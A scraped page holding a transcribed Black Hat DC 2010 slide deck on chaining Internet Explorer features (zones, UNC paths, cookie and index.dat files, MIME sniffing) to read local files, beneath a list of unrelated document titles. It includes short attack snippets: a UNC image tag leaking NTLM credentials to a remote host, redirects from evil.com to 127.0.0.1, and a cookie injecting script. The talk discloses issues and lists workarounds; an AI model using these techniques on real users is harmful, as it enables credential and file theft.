Internet Explorer turns your personal computer into a publicfile Server



Similar documents
Abusing Insecure Features of Internet Explorer

Actuality of SMBRelay in Modern Windows Networks

Criteria for web application security check. Version

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained

Customer Tips. Xerox Network Scanning HTTP/HTTPS Configuration using Microsoft IIS. for the user. Purpose. Background

Microsoft Security Bulletin MS Important

Windows Remote Access

Next Generation Clickjacking

Kaseya Server Instal ation User Guide June 6, 2008

Security Guide. BlackBerry Enterprise Service 12. for ios, Android, and Windows Phone. Version 12.0

MWR InfoSecurity Security Advisory. BT Home Hub SSID Script Injection Vulnerability. 10 th May Contents

An Introduction To The Web File Manager

Web Tracking for You. Gregory Fleischer

IIS Reverse Proxy Implementation

Virto Password Reset Web Part for SharePoint. Release Installation and User Guide

Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com

Pwning Intranets with HTML5

Using Internet or Windows Explorer to Upload Your Site

Penetration Testing Report Client: Business Solutions June 15 th 2015

Enabling Kerberos SSO in IBM Cognos Express on Windows Server 2008

Recommended Practice Case Study: Cross-Site Scripting. February 2007

How to configure SSL proxying in Zorp 6

XIA Configuration Server

Architecture and Data Flow Overview. BlackBerry Enterprise Service Version: Quick Reference

SECURITY BEST PRACTICES FOR CISCO PERSONAL ASSISTANT (1.4X)

Load Balancing. Outlook Web Access. Web Mail Using Equalizer

Attack Graph Techniques

Secure Web Development Teaching Modules 1. Security Testing. 1.1 Security Practices for Software Verification

If you examine a typical data exchange on the command connection between an FTP client and server, it would probably look something like this:

Using IIS and UltraDev Locally page 1

Installing GS Analyze version 8.5

How To Enable A Websphere To Communicate With Ssl On An Ipad From Aaya One X Portal On A Pc Or Macbook Or Ipad (For Acedo) On A Network With A Password Protected (

Click Studios. Passwordstate. Installation Instructions

CTIS 256 Web Technologies II. Week # 1 Serkan GENÇ

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

MWR InfoSecurity Security Advisory. pfsense DHCP Script Injection Vulnerability. 25 th July Contents

Web Vulnerability Assessment Report

Topics in Network Security

SINGLE SIGN-ON FOR MTWEB

How to configure SSL proxying in Zorp 3 F5

WebCruiser Web Vulnerability Scanner User Guide

NetWrix Password Manager. Quick Start Guide

Last Updated: July STATISTICA Enterprise Server Security

WPAD TECHNOLOGY WEAKNESSES. Sergey Rublev Expert in information security, "Positive Technologies"

Cross Site Scripting in Joomla Acajoom Component

Nessus scanning on Windows Domain

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

Magento Security and Vulnerabilities. Roman Stepanov

Application Security Testing. Generic Test Strategy

Check list for web developers

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

Industrial Security Facilities Database (ISFD) Troubleshooting Tips

Phishing by data URI

Outpost Network Security

inforouter V8.0 Server Migration Guide.

ProxyCap Help. Table of contents. Configuring ProxyCap Proxy Labs

NovaBACKUP xsp Version 15.0 Upgrade Guide

How to Enable LDAP Directory Services Authentication to Microsoft Active Directory in the HP cclass Onboard Administrator

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

Webapps Vulnerability Report

My FreeScan Vulnerabilities Report

EMC Celerra Network Server

During your session you will have access to the following lab configuration. CLIENT1 (Windows XP Workstation) /24

Web Security School Final Exam

NTP Software File Auditor for Windows Edition

IBM Aspera Add-in for Microsoft Outlook 1.3.2

Adobe Flash Player and Adobe AIR security

Web Security School Entrance Exam

Active Directory integration with CloudByte ElastiStor

Using Remote Web Workplace Version 1.01

A Roadmap for Securing IIS 5.0

Integration Guide. Microsoft Active Directory Rights Management Services (AD RMS) Microsoft Windows Server 2008

Buffalo Technology: Migrating your data to Windows Storage Server 2012 R2

NETWRIX USER ACTIVITY VIDEO REPORTER

Security Guidelines for MapInfo Discovery 1.1

WhatsUp Gold v16.2 MSP Edition Deployment Guide This guide provides information about installing and configuring WhatsUp Gold MSP Edition to central

Chapter 5 Configuring the Remote Access Web Portal

Web Application Firewall

HOW TO SILENTLY INSTALL CLOUD LINK REMOTELY WITHOUT SUPERVISION

Penetration Testing with Kali Linux

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Exploiting Transparent User Identification Systems

Security Research Advisory IBM inotes 9 Active Content Filtering Bypass

Single Sign-On for the Internet: A Security Story. Eugene Tsyrklevich eugene@tsyrklevich.name Vlad Tsyrklevich vlad902@gmail.com

Integrating VMware Horizon Workspace and VMware Horizon View TECHNICAL WHITE PAPER

Smartphone Pentest Framework v0.1. User Guide

RemotelyAnywhere Getting Started Guide

Running a Default Vulnerability Scan SAINTcorporation.com

Running a Default Vulnerability Scan

Advanced Endpoint Protection Overview

Administering Jive for Outlook

LT Auditor Windows Assessment SP1 Installation & Configuration Guide

6WRUP:DWFK. Policies for Dedicated IIS Web Servers Group. V2.1 policy module to restrict ALL network access

Thomas Röthlisberger IT Security Analyst

Migrating helpdesk to a new server

Transcription:

Internet Explorer turns your personal computer into a publicfile Server Black Hat DC 2010 Jorge Luis Alvarez Medina 1 Jorge Luis Alvarez Medina CORE Security Technologies February 2010

Outline Attack results Internet Explorer internals: a review Features (vulnerabilities) enumeration Turning the features into vulnerabilities to build an attack Overall Impact Corrigenda Demo (BeEFmodule as proof of concept) Solutions and workarounds Black Hat DC 2010 Jorge Luis Alvarez Medina 2

Attack results A successful compromise will result in an attacker being able to blindly read every single file in the local drive Either text and binary files (thanks MSXML2.DOMDocument.3.0!) Cross-domain information Navigation history Cookies SAM backup files Recently opened files Personal pictures Other files, depending on the computer compromised wwwroot in IIS Configuration files for other applications Black Hat DC 2010 Jorge Luis Alvarez Medina 3

Internet Explorer internals: a review Every browser has its own idiosyncrasies For the purposes of this presentation, it is convenient to review some design features of Internet Explorer Security Zones Zone Elevation MIME type detection Black Hat DC 2010 Jorge Luis Alvarez Medina 4

Security Zones Enable administrators to divide URL namespaces according to their respective levels of trust and to manage each level with an appropriate URL policy Different treatment for web content depending on its source Five different sets of privileges (zones) Restricted Sites Internet Trusted Sites Local Intranet Local Machine Black Hat DC 2010 Jorge Luis Alvarez Medina 5

Zone Elevation It occurs when a Web page in a given security zoneloads a page from a less restrictive zone in a frame or a new window Internet Explorerbehaves different based on which is the less restrictive zone up to which is trying to elevate to the Local Machinezone is blocked to the Intranet or Trusted Sites zones prompts for a confirmation from the Restricted Sites zone to the Internet zone is allowed that is a bad idea Black Hat DC 2010 Jorge Luis Alvarez Medina 6

MIME type detection Tests URL monikers through the FindMimeFromData method Determining the MIME type proceeds as follows: If the suggested MIME type is unknown, FindMimeFromData immediately returns this MIME type as the final determination If the server-provided MIME type is either known or ambiguous, the buffer is scanned in an attempt to verify or obtain a MIME type If a positive match is found this MIME type is immediately returned as the final determination, overriding the server-provided MIME type If no positive match is obtained, and if the server-provided MIME type is known if no conflict exists, the server-provided MIME type is returned if conflict exist, the file extension is tried Otherwise defaults to text/plain or application/octet-stream Black Hat DC 2010 Jorge Luis Alvarez Medina 7

Features (vulnerabilities) enumeration Hiding the key under the doormat A chip off the old block Two zones, the same place How to put HTML/script code in remote computers Everything that glitters is not gold Black Hat DC 2010 Jorge Luis Alvarez Medina 8

Hiding the key under the doormat Internet Explorercookies and history files are stored in different files and folders under %USERPROFILE% As a security measure, these files are stored inside randomly named folders with random file names These random names and locations are logged inside different mapping files named index.dat %USERPROFILE%\Local settings\history\history.ie5\index.dat %USERPROFILE%\Local settings\iecompatcache\index.dat %USERPROFILE%\Cookies\index.dat Black Hat DC 2010 Jorge Luis Alvarez Medina 9

Hiding the key under the doormat (2) These files are not entirely text formatted sensitive information is stored in plain text! As these files work as maps to other files, access to these files would reveal the actual locations of mapped files and folders Black Hat DC 2010 Jorge Luis Alvarez Medina 10

A chip off the old block Internet Explorerresembles Windows Explorerin many aspects both of them implement the Trident layout engine both of them support UNC paths for SMB access This way, Internet Explorerallows to access special files and folders, same as Windows Explorerdoes. Black Hat DC 2010 Jorge Luis Alvarez Medina 11

A chip off the old block (2) Black Hat DC 2010 Jorge Luis Alvarez Medina 12

A chip off the old block (3) Black Hat DC 2010 Jorge Luis Alvarez Medina 13

A chip off the old block (4) Black Hat DC 2010 Jorge Luis Alvarez Medina 14

A chip off the old block (5) Any web page in the Internetzone or above can include an HTML tag as follows: <img src="\\208.77.188.166\image.jpg"> It will trigger an SMB request against 208.77.188.166 As part of the challenge-responsenegotiation, the client sends to the server the following information about itself: Windows user name Windows domain name Windows computer name A challenge value chosen by the web server ciphered with the LM/NTLM hash of this user s password Black Hat DC 2010 Jorge Luis Alvarez Medina 15

Two zones, the same place Internet Explorerwill determine the security zone of a given UNC address as belonging to: The Internetsecurity zone if this path contains the IP address of the target machine The Local Intranetsecurity zone if this path contains the NetBIOS name of the target machine It makes sense, as SMB names just can be resolved in the same network segment Black Hat DC 2010 Jorge Luis Alvarez Medina 16

Two zones, the same place (2) But what about yourself? \\NEGRITAis in the Local Intranetzone \\127.0.0.1 is in the Internet zone This is one of the root causes of the problems the Microsoft staff has into closing the attack vectors exposed here After several discussions with MSRC team members, they stated this issue is kind of a dead end, and cannot be fixed Black Hat DC 2010 Jorge Luis Alvarez Medina 17

Two zones, the same place (3) According to the Security Zonesscheme, a page in a given zone can not redirect its navigation to a more privileged zone This behavior is known as Zone Elevation Now, consider the following dialog: GET /page.html HTTP/1.0 Host: evil.com HTTP 302 Found Location: \\127.0.0.1\resource.html In this case Internet Explorerwill erroneously (due to this ambiguity) apply Zone Elevationrestrictions and the redirection will effectively occur Black Hat DC 2010 Jorge Luis Alvarez Medina 18

Two zones, the same place (4) There is another way to bypass Security Zone restrictions Suppose that example.com(10.1.1.1) was explicitly added to the Restricted Sites Security Zone Then this URI will be treated with the privileges of that zone http://example.com/index.html However, if the same resource is requested using the UNC notation, it will be treated as belonging to the Internet Security Zone \\10.1.1.1\index.html Restricted Sitesrestrictions to a given resource are bypassed if it can be accessed using a different protocol [file: https: ] Black Hat DC 2010 Jorge Luis Alvarez Medina 19

Two zones, the same place (5) Black Hat DC 2010 Jorge Luis Alvarez Medina 20

How to put HTML/script code in remote computers There are different ways for remote servers to write HTML/script code in clients hard drives Navigation history files Cookies Mapping files (Internet Explorer index.dat) Black Hat DC 2010 Jorge Luis Alvarez Medina 21

How to put HTML/script code in remote computers (2) Problems in the design/implementation of these feature Contents are saved as they were received, with little or no sanitization/overhead, into these files Including index.dat files Internet Explorerallows rendering the contents of non-pure HTML files skipping the parts that can not be rendered Black Hat DC 2010 Jorge Luis Alvarez Medina 22

How to put HTML/script code in remote computers (3) GET /page.html HTTP/1.0 Host: evil.com HTTP 302 Found Set-Cookie: <script>alert('hello world!')</script> Cookie contents: Code <script>alert('hello world')</script> 192.168.196.129/ 1600 3567004032 30124358 525906608 30055927 * Black Hat DC 2010 Jorge Luis Alvarez Medina 23

Everything that glitters is not gold The way Internet Explorerdecides how to treat a given file is known as MIME type detection It basically uses an algorithm to find and launch the correct object server/application to handle the requested content Is based on information obtained from The server-supplied MIME type, if available An examination of the actual contents associated with a downloaded URL ( FindMimeFromData) The file name associated with the downloaded content (assumed to be derived from the associated URL) Registry settings (file extension/mime type associations or registered applications) in effect during the download Black Hat DC 2010 Jorge Luis Alvarez Medina 24

Everything that glitters is not gold (2) Problems in the design/implementation of this feature The server-provided MIME type is returned when the following conditions are true: no positive match is obtained from the FindMimeFromData()buffer scan server-provided MIME type is known no conflict exists (format is either text or binary) Has been probed (more than once) not to behave deterministically when accessing the same resource through different methods direct navigation redirection frame/iframereference scripting Black Hat DC 2010 Jorge Luis Alvarez Medina 25

Everything that glitters is not gold (3) CORE-2008-0826 Security Advisory fixed in Microsoft Security Bulletin MS09-019 Get unknown.type rendered as HTML <object data="redirect.pl" type="text/html" width="50" height="50"> </object> GET /redirect.pl HTTP/1.0 Host: evilserver.com Status: 302 Found Content-type: text/html Location: /unknown.type Black Hat DC 2010 Jorge Luis Alvarez Medina 26

Turning features into vulnerabilities to build an attack In and of itself each of these bugs may not seem like something you should be concerned about The combined use of them by an attacker may lead to some interesting attacks Case 1: Attacking local networks with shared folders Case 2: Attacking the Internet user Black Hat DC 2010 Jorge Luis Alvarez Medina 27

Case 1: Attacking local networks with shared folders Black Hat DC 2010 Jorge Luis Alvarez Medina 28

Case 1: Attacking local networks with shared folders (2) The attacker puts an HTML file in the victim s shared folder \\VICTIM\shared\evil.html The victim is enticed to click a link to a webpage that redirects the navigation flow towards the malicious file the attacker uploaded to a shared folder Status: 302 Found Location: file://127.0.0.1/shared/evil.html If successful, the attacker will have HTML and scripting code running in the context of 127.0.0.1 Black Hat DC 2010 Jorge Luis Alvarez Medina 29

Case 2: Attacking the Internet user Black Hat DC 2010 Jorge Luis Alvarez Medina 30

Case 2: Attacking the Internet user (2) The user is enticed to click a link to a malicious page This page contains <img>tags with UNC paths to the malicious server. This way, the attacker obtains the victim s windows user name The website then writes HTML code inside the Internet Explorerinternal tracking files (history index.dat, cookies) through specially crafted URI/HTML/cookies In the meantime, the malicious server prepares references with to the Internet Explorerinternal tracking files with correct pathnames by using the victim s Windows user nameobtained in the previous steps Black Hat DC 2010 Jorge Luis Alvarez Medina 31

Case 2: Attacking the Internet user (3) Then, navigation flow is redirected towards these files using UNC paths. As explained before, this is still the Internet zone, so Internet Explorer will not complain about it The attacker has to find a way for Internet Explorer to treat the files she wrote in as HTML This has been done in the past (and will certainly be done in the future) in several different ways The complexity of MIME type detection and the particular idiosyncrasies of Internet Explorer are at play in this step If successful, the attacker will have HTML and scripting code running in the context of 127.0.0.1 Black Hat DC 2010 Jorge Luis Alvarez Medina 32

Overall impact By chaining the exploitation of a series of weak featuresan attacker is able to store HTML and scripting code in the victim s computer force the victim s browser to load and render it 127.0.0.1 is in theinternet Zone, but as the code is actually stored in the victim s computer, it can access other files in the same computer (in this case, the victim s computer) SAM backup files all of the victim s HTTP cookies and history files Source files in Inetpub\wwwroot Recent files, personal pictures (thumbs.db maps these files) any other file on the local system (system events, configurations) Black Hat DC 2010 Jorge Luis Alvarez Medina 33

Overall impact (2) These attack scenarios have been proven to work CORE-2008-01035 CORE-2008-0826 CORE-2009-06256 The only difference is in the way Internet Exploreris tricked into rendering its internal tracking files as HTML cookies index.dat That is the only thing Microsoftis fixing This is a design problem. They are just blocking our proof of concept That is why we are breaking it over and over again Black Hat DC 2010 Jorge Luis Alvarez Medina 34

Corrigenda Not a formal Zone Elevationissue CVE-2009-1140 gives a wrong description of the issue Tags it as a Cross-Domain Information Disclosure Vulnerability CVE-2008-1448 is more precise allows remote attackers to bypass intended access restrictions and read arbitrary files Both of them are the same problem Black Hat DC 2010 Jorge Luis Alvarez Medina 35

Demo (BeEF module) be patient! Black Hat DC 2010 Jorge Luis Alvarez Medina 36

Solutions and workarounds Internet Explorer Network Protocol Lockdown Set the Security Level setting for the Internet and Intranet zones to High Disable Active Scriptingfor the Internetand Intranetzone with a custom setting Only run Internet Explorer in Protected Mode Use a different web browser to navigate untrusted web sites Black Hat DC 2010 Jorge Luis Alvarez Medina 37

Thanks for coming! Black Hat DC 2010 Jorge Luis Alvarez Medina 38